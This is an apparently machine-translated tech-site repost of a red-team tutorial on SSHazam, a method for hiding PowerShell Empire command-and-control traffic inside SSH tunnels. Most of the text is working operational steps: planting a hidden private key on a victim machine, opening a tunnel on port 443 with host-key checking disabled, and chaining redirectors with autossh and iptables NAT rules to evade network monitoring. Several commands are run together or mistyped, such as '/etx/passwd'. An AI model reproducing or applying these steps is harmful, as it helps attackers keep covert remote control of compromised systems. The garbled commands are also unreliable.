Shulou(Shulou.com)06/02 Report--

This article will explain in detail how to use SSH tunnel to achieve covert C2 communication in SSHazam. Xiaobian thinks it is quite practical, so share it with you as a reference. I hope you can gain something after reading this article.

SSHazam is a technique that helps you hide any C2 tool traffic behind standard SSH communication channels from network surveillance.

go straight to the theme

In the demo sample below, we run PowerShell Empire, which connects to the localhost port of the target user. The local port forwards traffic to the remote Empire server via an SSH connection, so the only traffic detected by Detection Tools is SSH traffic. The target system is OS X, but this technology can also be implemented on Windows platforms using Plink.exe.

As shown above, the target system has an SSH channel listening on port 5430 that forwards all received data to the Empire server. The Empire server runs an Empire instance and listens on the same port at localhost (127.0.0.1: 5430). To better hide SSH traffic, we also had the SSH server listen on port 443 instead of the standard port 22. Don't forget to modify the SSH configuration file so that it listens on this port, and then modify Cloud Firewall to allow traffic through.

You will also need to make a copy of the private key before establishing the connection to the target system, and the corresponding public key must be added to the authorized_keys file on the Empire server. In the demo example, we will place the private key file at ~/.ssh/.do.key on the target system. The following steps need to be performed on the command line:

mkdir~/.sshchmod700 ~/.sshecho-----BEGIN RSA PRIVATE KEY----- >> ~/.ssh/.do.keyechoMIIJKAIBAAKCAgEArVuMJdwgl9z9s1C0mrYV05hwUevmY+CkJaY/1iiPJSE6/AAp >>~/.ssh/.do.keyecho+qkMZ9nrHkBQtaQMrXPW5MQXLxU/o8LQ5QyPiy/B4FiGEfNSx//mSJvEYAXXN4zC >>~/.ssh/.do.keyechoRkiQ5Eir83CLCZFLRWV8wFvNkGV2krxMXDtHHFL5ars/J7tdBekmYI62eXnE5oXl >>~/.ssh/.do.keyechoNHky2x6YsnQf5lOkC1XyWvwg77gR2kRhb9KpOi+hp6xB42o00mpbZgyY5V4= >>~/.ssh/.do.keyecho-----END RSA PRIVATE KEY----- >> ~/.ssh/.do.keychmod600 ~/.ssh/.do.key

To prevent others from accessing this private key, you need to modify the Empire server configuration. Edit/etx/passwd and change the login path to/bin/false:

victim:x:1001:1001:VictimGuy,,,:/home/victim:/bin/false

After storing the private key in the target system, you only need to run the following command to open the SSH channel and port:

ssh -i~/.ssh/.do.key -p 443 -N -f-oStrictHostKeyChecking=no victim@empire-server.corp.com -L 5430:127.0.0.1:5430

Now you need to configure PowerShell Empire, or your own C2, to listen for 127.0.0.1: 5430. At this point, all C2 traffic will be hidden in encrypted SSH channels, and you don't have to worry about other network monitoring tools.

technical analysis

This technique is actually very simple and can give you a C2 session directly. Sometimes you may not want to store sensitive customer information on a third-party Cloud Virtual Machine, so you need to set up an additional redirection tool to forward cloud host traffic to your own network. The whole process is roughly as shown in the following figure:

C2 connections are forwarded to the Empire redirector over SSH channels. The Empire redirector's firewall rules forward traffic to another redirector (middleware), which then establishes a reverse SSH connection to forward traffic to its final destination.

SSH commands that need to be run on the target device are as follows:

ssh-i ~/.ssh/.do.key -p 443 -N -f-oStrictHostKeyChecking=no victim@empire-redirector.corp.com -L5430:127.0.0.1:5431

SSH commands run on the attack host are as follows:

autossh-M 5431 -o ServerAliveInterval=30 -R 5433:10.10.10.185:5430 root@redirector.corp.com

You may also need to install autosh first, as it keeps your SSH channel communicating for a long time.

The IP Table rules for the Empire redirector are as follows:

iptables-t nat -A OUTPUT -m addrtype --src-type LOCAL --dst-type LOCAL -p tcp -mmultiport --dports 5430:65535 -j DNAT --to-destination 128.62.137.184:5432iptables-t nat -A POSTROUTING -m addrtype --src-type LOCAL --dst-type UNICAST -jMASQUERADEsysctl-w net.ipv4.conf.all.route_localnet=1

At this point, the tool will forward all traffic from port 5430 to port 65535 to the final redirector, so that you can capture all traffic from the target user.

The IP Table rules for the redirector are as follows:

sysctl-w net.ipv4.conf.all.route_localnet=1iptables-t nat -I PREROUTING -p tcp --dport 5432 -j DNAT --to 127.0.0.1:5433

This may seem complicated, but it's a very practical way to protect sensitive data outside your cloud.

If you want to be notified after SSH connection is established, you can add the following two lines to/etc/pam.d/sshd:

session[success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.soopensessionoptional pam_exec.so/home/root/ssh-slack-alert.sh My notification alert script code is as follows: #!/ usr/bin/envbash if ["$PAM_USER" != "admin" ] && [ $PAM_TYPE != "close_session" ]thenmessage="\`\`PamType:$PAM_TYPE\nSSH-User: $PAM_USER\nRhost: $PAM_RHOST\nServer: SSHazam\nHostname:`hostname`\`\`\`" curl-X POST \ --data-urlencode"payload={\"channel\": \"alerts\",\"username\": \"SSHazam\", \"text\":\"${message}\", \"icon_emoji\": \":boom:\"}"\ https://hooks.slack.com/services/YOUR/SLACK/HOOKHEREfi About "SSHazam how to use SSH tunnel to achieve covert C2 communication" This article is shared here, I hope the above content can be of some help to everyone, so that you can learn more knowledge, if you think the article is good, please share it to let more people see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.